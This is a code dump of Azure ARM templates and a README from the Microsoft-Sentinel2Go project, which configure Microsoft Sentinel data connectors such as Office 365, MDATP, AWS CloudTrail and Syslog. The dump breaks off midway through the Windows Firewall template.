https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Wireless.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel Data Connectors 2 | 3 | 4 | 5 | 6 |
7 | 8 | 9 | 10 |
11 |
12 | 13 | The current kind of Data Connectors deployed via ARM templates in this project are of type [Microsoft.OperationsManagement/solutions](https://docs.microsoft.com/en-us/azure/templates/microsoft.operationsmanagement/2015-11-01-preview/solutions) and [Microsoft.OperationalInsights/workspaces/dataSources](https://docs.microsoft.com/en-us/azure/templates/microsoft.operationalinsights/2015-11-01-preview/workspaces/datasources) 14 | 15 | 16 | | Display Name | Data Table | Type | Kind | 17 | |----|----|----|----| 18 | | [Amazon Web Services](https://docs.microsoft.com/en-us/azure/sentinel/connect-aws) | AWSCloudTrail | Data Connector | AmazonWebServicesCloudTrail | 19 | | [Azure Activity](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-activity) | AzureActivity | Data Source | AzureActivityLog | 20 | | [Azure Security Center](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-security-center) | SecurityAlert | Data Connector | AzureSecurityCenter | 21 | | [DNS (Preview)](https://docs.microsoft.com/en-us/azure/sentinel/connect-dns) | DnsEvents, DnsInventory | Solution | DnsAnalytics | 22 | | [Security Events](https://docs.microsoft.com/en-us/azure/sentinel/connect-windows-security-events) | SecurityEvent | Data Source | SecurityInsightsSecurityEventCollectionConfiguration | 23 | | [Windows Firewall](https://docs.microsoft.com/en-us/azure/sentinel/connect-windows-firewall) | WindowsFirewall | Solution | WindowsFirewall | 24 | | [Office 365](https://docs.microsoft.com/en-us/azure/sentinel/connect-office-365) | OfficeActivity | Data Connector | Office365 | 25 | | [Azure AD](https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-active-directory) | SigninLogs, AuditLogs | Data Connector | AzureActiveDirectory | 26 | 27 | # References 28 | 29 | * https://docs.microsoft.com/en-us/azure/sentinel/connect-data-sources 30 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/aatp.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "aatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "AATP alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2020-01-01", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "AzureAdvancedThreatProtection", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('aatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/awsCloudTrail.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "awsRoleArn": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "The AWS Role Amazon Resource Name (ARN) created with AWSCloudTrailReadOnlyAccess to access the Log Analytics workspace" 19 | } 20 | }, 21 | "location": { 22 | "type": "string", 23 | "defaultValue": "[resourceGroup().location]", 24 | "metadata": { 25 | "description": "Location for all resources." 26 | } 27 | } 28 | }, 29 | "resources": [ 30 | { 31 | "type": "Microsoft.SecurityInsights/dataConnectors", 32 | "apiVersion": "2020-01-01", 33 | "location": "[parameters('location')]", 34 | "name": "[concat(parameters('workspaceName'), concat('/',parameters('guidValue')))]", 35 | "kind": "AmazonWebServicesCloudTrail", 36 | "properties": { 37 | "awsRoleArn": "[parameters('awsRoleArn')]", 38 | "dataTypes": { 39 | "logs": { 40 | "state": "enabled" 41 | } 42 | } 43 | } 44 | } 45 | ] 46 | } 47 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureADDiagnosticSettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-08-01/tenantDeploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "resourceGroup": { 6 | "type": "string", 7 | "defaultValue": "", 8 | "metadata": { 9 | "description": "The resource group to deploy all the resources to" 10 | } 11 | }, 12 | "subscriptionId": { 13 | "type": "string", 14 | "defaultValue": "", 15 | "metadata": { 16 | "description": "The subscriptionId to deploy all the resources to" 17 | } 18 | }, 19 | "workspaceId": { 20 | "type": "string", 21 | "defaultValue": "", 22 | "metadata": { 23 | "description": "Your own existing log analytics workspace ID. Leave it empty if you are deploying a new LA workspace." 24 | } 25 | }, 26 | "utcValue": { 27 | "type": "string", 28 | "metadata": { 29 | "description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" 30 | }, 31 | "defaultValue": "[utcNow()]" 32 | } 33 | }, 34 | "resources": [ 35 | { 36 | "type": "microsoft.aadiam/diagnosticSettings", 37 | "apiVersion": "2017-04-01", 38 | "name": "[concat('AADConnector-',uniqueString(parameters('subscriptionId'),parameters('resourceGroup'),parameters('utcValue')))]", 39 | "properties": { 40 | "workspaceId": "[if(empty(parameters('workspaceId')), concat('/subscriptions/', parameters('subscriptionId'), '/resourceGroups/', parameters('resourceGroup'), '/providers/microsoft.operationalinsights/workspaces/', reference('deployMSSentinel2Go').outputs.workspaceName.value), parameters('workspaceId'))]", 41 | "logs": [ 42 | { 43 | "category": "SignInLogs", 44 | "enabled": true 45 | }, 46 | { 47 | "category": "AuditLogs", 48 | "enabled": true 49 | }, 50 | { 51 | "category": "NonInteractiveUserSignInLogs", 52 | "enabled": true 53 | }, 54 | { 55 | "category": "ServicePrincipalSignInLogs", 56 | "enabled": true 57 | }, 58 | { 59 | "category": "ManagedIdentitySignInLogs", 60 | "enabled": true 61 | }, 62 | { 63 | "category": "ProvisioningLogs", 64 | "enabled": true 65 | } 66 | ], 67 | "metrics": [] 68 | } 69 | } 70 | ] 71 | } 72 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureADIdentityProtection.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "tenantId": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Tenand Id" 19 | } 20 | }, 21 | "createAADIdentityProtectionIncidents": { 22 | "type": "bool", 23 | "defaultValue": false, 24 | "metadata": { 25 | "description": "Create incidents automatically from all alerts generated in this connected service." 26 | } 27 | }, 28 | "location": { 29 | "type": "string", 30 | "defaultValue": "[resourceGroup().location]", 31 | "metadata": { 32 | "description": "Location for all resources." 33 | } 34 | } 35 | }, 36 | "variables": { 37 | "aadipName": "[concat('aadip', uniqueString(resourceGroup().id))]" 38 | }, 39 | "resources": [ 40 | { 41 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 42 | "apiVersion": "2020-01-01", 43 | "location": "[parameters('location')]", 44 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('aadipName'))]", 45 | "kind": "AzureActiveDirectory", 46 | "properties": { 47 | "tenantId": "[parameters('tenantId')]", 48 | "dataTypes": { 49 | "alerts": { 50 | "state": "enabled" 51 | } 52 | } 53 | } 54 | }, 55 | { 56 | "condition": "[parameters('createAADIdentityProtectionIncidents')]", 57 | "type": "Microsoft.SecurityInsights/alertRules", 58 | "apiVersion": "2020-01-01", 59 | "location": "[parameters('location')]", 60 | "name": "[parameters('guidValue')]", 61 | "kind": "MicrosoftSecurityIncidentCreation", 62 | "properties": { 63 | "displayName": "Create incidents based on Azure Active Directory Identity Protection alerts", 64 | "description": "Create incidents based on all alerts generated in Azure Active Directory Identity Protection", 65 | "enabled": true, 66 | "productFilter": "Azure Active Directory Identity Protection" 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureActivityLog.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "subscriptionId": { 12 | "type": "string", 13 | "defaultValue": "[subscription().subscriptionId]", 14 | "metadata": { 15 | "description": "Sbscription Id to monitor" 16 | } 17 | }, 18 | "location": { 19 | "type": "string", 20 | "defaultValue": "[resourceGroup().location]", 21 | "metadata": { 22 | "description": "Location for all resources." 23 | } 24 | } 25 | }, 26 | "resources": [ 27 | { 28 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 29 | "apiVersion": "2020-03-01-preview", 30 | "location": "[parameters('location')]", 31 | "name": "[concat(parameters('workspaceName'), concat('/',replace(parameters('subscriptionId'),'-', '')))]", 32 | "kind": "AzureActivityLog", 33 | "properties": { 34 | "linkedResourceId": "[concat('/subscriptions/', parameters('subscriptionId'), '/providers/microsoft.insights/eventtypes/management')]" 35 | } 36 | } 37 | ] 38 | } 39 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/azureSecurityCenter.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "subscriptionId": { 16 | "type": "string", 17 | "defaultValue": "[subscription().subscriptionId]", 18 | "metadata": { 19 | "description": "Sbscription Id to monitor" 20 | } 21 | }, 22 | "ascState": { 23 | "type": "string", 24 | "metadata": { 25 | "description": "ASC state" 26 | } 27 | }, 28 | "location": { 29 | "type": "string", 30 | "defaultValue": "[resourceGroup().location]", 31 | "metadata": { 32 | "description": "Location for all resources." 33 | } 34 | } 35 | }, 36 | "resources": [ 37 | { 38 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 39 | "apiVersion": "2020-01-01", 40 | "location": "[parameters('location')]", 41 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 42 | "kind": "AzureSecurityCenter", 43 | "properties": { 44 | "subscriptionId": "[parameters('subscriptionId')]", 45 | "dataTypes": { 46 | "alerts": { 47 | "state": "[parameters('ascState')]" 48 | } 49 | } 50 | } 51 | } 52 | ] 53 | } 54 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/dnsAnalytics.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "location": { 18 | "type": "string", 19 | "defaultValue": "[resourceGroup().location]", 20 | "metadata": { 21 | "description": "Location for all resources." 22 | } 23 | } 24 | }, 25 | "resources": [ 26 | { 27 | "type": "Microsoft.OperationsManagement/solutions", 28 | "apiVersion": "2015-11-01-preview", 29 | "name": "[concat('DnsAnalytics','(', parameters('workspaceName'),')')]", 30 | "location": "[parameters('location')]", 31 | "plan": { 32 | "name": "[concat('DnsAnalytics','(', parameters('workspaceName'),')')]", 33 | "promotionCode": "", 34 | "product": "OMSGallery/DnsAnalytics", 35 | "publisher": "Microsoft" 36 | }, 37 | "properties": { 38 | "workspaceResourceId": "[parameters('workspaceId')]", 39 | "containedResources": [] 40 | } 41 | } 42 | ] 43 | } 44 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/m365defender.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "connectM365Incidents": { 12 | "type": "bool", 13 | "metadata": { 14 | "description": "Connect Microsoft 365 Defender​ incidents to your Microsoft Sentinel. Incidents will appear in the incidents queue" 15 | }, 16 | "defaultValue": true 17 | }, 18 | "tenantId": { 19 | "type": "string", 20 | "metadata": { 21 | "description": "Tenand Id" 22 | } 23 | }, 24 | "location": { 25 | "type": "string", 26 | "defaultValue": "[resourceGroup().location]", 27 | "metadata": { 28 | "description": "Location for all resources." 29 | } 30 | } 31 | }, 32 | "variables": { 33 | "m365DefenderName": "[concat('m365defender', uniqueString(resourceGroup().id))]", 34 | "officeATPName": "[concat('oatp', uniqueString(resourceGroup().id))]", 35 | "mdatpName": "[concat('mdatp', uniqueString(resourceGroup().id))]", 36 | "aatpName": "[concat('aatp', uniqueString(resourceGroup().id))]", 37 | "mcasName": "[concat('mcas', uniqueString(resourceGroup().id))]" 38 | }, 39 | "resources": [ 40 | { 41 | "condition": "[parameters('connectM365Incidents')]", 42 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 43 | "apiVersion": "2020-01-01", 44 | "location": "[parameters('location')]", 45 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('m365DefenderName'))]", 46 | "kind": "MicrosoftThreatProtection", 47 | "properties": { 48 | "tenantId": "[parameters('tenantId')]", 49 | "dataTypes": { 50 | "incidents": { 51 | "state": "enabled" 52 | }, 53 | "alerts": { 54 | "state": "enabled" 55 | } 56 | } 57 | } 58 | }, 59 | { 60 | "condition": "[parameters('connectM365Incidents')]", 61 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 62 | "apiVersion": "2019-01-01-preview", 63 | "location": "[parameters('location')]", 64 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('mdatpName'))]", 65 | "kind": "MicrosoftDefenderAdvancedThreatProtection", 66 | "properties": { 67 | "tenantId": "[parameters('tenantId')]", 68 | "dataTypes": { 69 | "alerts": { 70 | "state": "enabled" 71 | } 72 | } 73 | } 74 | }, 75 | { 76 | "condition": "[parameters('connectM365Incidents')]", 77 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 78 | "apiVersion": "2019-01-01-preview", 79 | "location": "[parameters('location')]", 80 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('officeATPName'))]", 81 | "kind": "OfficeATP", 82 | "properties": { 83 | "tenantId": "[parameters('tenantId')]", 84 | "dataTypes": { 85 | "alerts": { 86 | "state": "enabled" 87 | } 88 | } 89 | } 90 | }, 91 | { 92 | "condition": "[parameters('connectM365Incidents')]", 93 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 94 | "apiVersion": "2020-01-01", 95 | "location": "[parameters('location')]", 96 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('aatpName'))]", 97 | "kind": "AzureAdvancedThreatProtection", 98 | "properties": { 99 | "tenantId": "[parameters('tenantId')]", 100 | "dataTypes": { 101 | "alerts": { 102 | "state": "enabled" 103 | } 104 | } 105 | } 106 | }, 107 | { 108 | "condition": "[parameters('connectM365Incidents')]", 109 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 110 | "apiVersion": "2020-01-01", 111 | "location": "[parameters('location')]", 112 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',variables('mcasName'))]", 113 | "kind": "MicrosoftCloudAppSecurity", 114 | "properties": { 115 | "tenantId": "[parameters('tenantId')]", 116 | "dataTypes": { 117 | "alerts": { 118 | "state": "enabled" 119 | }, 120 | "discoveryLogs": { 121 | "state": "enabled" 122 | } 123 | } 124 | } 125 | } 126 | ] 127 | } 128 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/m365defenderAPI.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "SentinelExportSettings-", 3 | "workspaceProperties": { 4 | "workspaceResourceId": "/subscriptions//providers/Microsoft.OperationalInsights/workspaces/" 5 | }, 6 | "logs": [ 7 | { 8 | "category": "AdvancedHunting-DeviceInfo", 9 | "enabled": true 10 | }, 11 | { 12 | "category": "AdvancedHunting-DeviceNetworkInfo", 13 | "enabled": true 14 | }, 15 | { 16 | "category": "AdvancedHunting-DeviceProcessEvents", 17 | "enabled": true 18 | }, 19 | { 20 | "category": "AdvancedHunting-DeviceNetworkEvents", 21 | "enabled": true 22 | }, 23 | { 24 | "category": "AdvancedHunting-DeviceFileEvents", 25 | "enabled": true 26 | }, 27 | { 28 | "category": "AdvancedHunting-DeviceRegistryEvents", 29 | "enabled": true 30 | }, 31 | { 32 | "category": "AdvancedHunting-DeviceLogonEvents", 33 | "enabled": true 34 | }, 35 | { 36 | "category": "AdvancedHunting-DeviceImageLoadEvents", 37 | "enabled": true 38 | }, 39 | { 40 | "category": "AdvancedHunting-DeviceEvents", 41 | "enabled": true 42 | }, 43 | { 44 | "category": "AdvancedHunting-DeviceFileCertificateInfo", 45 | "enabled": true 46 | } 47 | ] 48 | } 49 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/mcas.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "mcasAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "MCAS alerts state" 19 | } 20 | }, 21 | "mcasDiscoveryLogs": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "MCAS discovery logs" 25 | } 26 | }, 27 | "tenantId": { 28 | "type": "string", 29 | "metadata": { 30 | "description": "Tenand Id" 31 | } 32 | }, 33 | "location": { 34 | "type": "string", 35 | "defaultValue": "[resourceGroup().location]", 36 | "metadata": { 37 | "description": "Location for all resources." 38 | } 39 | } 40 | }, 41 | "resources": [ 42 | { 43 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 44 | "apiVersion": "2020-01-01", 45 | "location": "[parameters('location')]", 46 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 47 | "kind": "MicrosoftCloudAppSecurity", 48 | "properties": { 49 | "tenantId": "[parameters('tenantId')]", 50 | "dataTypes": { 51 | "alerts": { 52 | "state": "[parameters('mcasAlerts')]" 53 | }, 54 | "discoveryLogs": { 55 | "state": "[parameters('mcasDiscoveryLogs')]" 56 | } 57 | } 58 | } 59 | } 60 | ] 61 | } 62 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/mdatp.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "mdatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "MDATP alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "MicrosoftDefenderAdvancedThreatProtection", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('mdatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/office365.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "exchangeState": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Exchange state" 19 | } 20 | }, 21 | "sharePointState": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "SharePoint state" 25 | } 26 | }, 27 | "teamsState": { 28 | "type": "string", 29 | "metadata": { 30 | "description": "Teams state" 31 | } 32 | }, 33 | "tenantId": { 34 | "type": "string", 35 | "metadata": { 36 | "description": "Tenand Id" 37 | } 38 | }, 39 | "location": { 40 | "type": "string", 41 | "defaultValue": "[resourceGroup().location]", 42 | "metadata": { 43 | "description": "Location for all resources." 44 | } 45 | } 46 | }, 47 | "resources": [ 48 | { 49 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 50 | "apiVersion": "2020-01-01", 51 | "location": "[parameters('location')]", 52 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 53 | "kind": "Office365", 54 | "properties": { 55 | "tenantId": "[parameters('tenantId')]", 56 | "dataTypes": { 57 | "exchange": { 58 | "state": "[parameters('exchangeState')]" 59 | }, 60 | "sharePoint": { 61 | "state": "[parameters('sharePointState')]" 62 | }, 63 | "teams": { 64 | "state": "[parameters('teamsState')]" 65 | } 66 | } 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/officeATP.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "oatpAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Oatp alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "OfficeATP", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "alerts": { 46 | "state": "[parameters('oatpAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/securityEvents.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "securityCollectionTier": { 12 | "type": "string", 13 | "allowedValues": [ 14 | "All", 15 | "Recommended", 16 | "Minimal", 17 | "None" 18 | ], 19 | "metadata": { 20 | "description": "Tier for gathering Windows Security Events." 21 | } 22 | }, 23 | "location": { 24 | "type": "string", 25 | "defaultValue": "[resourceGroup().location]", 26 | "metadata": { 27 | "description": "Location for all resources." 28 | } 29 | } 30 | }, 31 | "resources": [ 32 | { 33 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 34 | "apiVersion": "2020-03-01-preview", 35 | "location": "[parameters('location')]", 36 | "name": "[concat(parameters('workspaceName'), '/SecurityInsightsSecurityEventCollectionConfiguration')]", 37 | "kind": "SecurityInsightsSecurityEventCollectionConfiguration", 38 | "properties": { 39 | "tier": "[parameters('securityCollectionTier')]", 40 | "tierSetMethod": "Custom" 41 | } 42 | } 43 | ] 44 | } 45 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/syslogCollection.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "defaultValue": "[resourceGroup().location]", 14 | "metadata": { 15 | "description": "Location for all resources." 16 | } 17 | } 18 | }, 19 | "resources": [ 20 | { 21 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 22 | "apiVersion": "2020-03-01-preview", 23 | "location": "[parameters('location')]", 24 | "name": "[concat(parameters('workspaceName'), '/syslogCollection')]", 25 | "kind": "LinuxSyslogCollection", 26 | "properties": { 27 | "state": "Enabled" 28 | } 29 | } 30 | ] 31 | } 32 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/threatIntelligence.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "tiAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Thread Intelligence alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "ThreatIntelligence", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "indicators": { 46 | "state": "[parameters('tiAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/windowsFirewall.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "location": { 18 | "type": "string", 19 | "defaultValue": 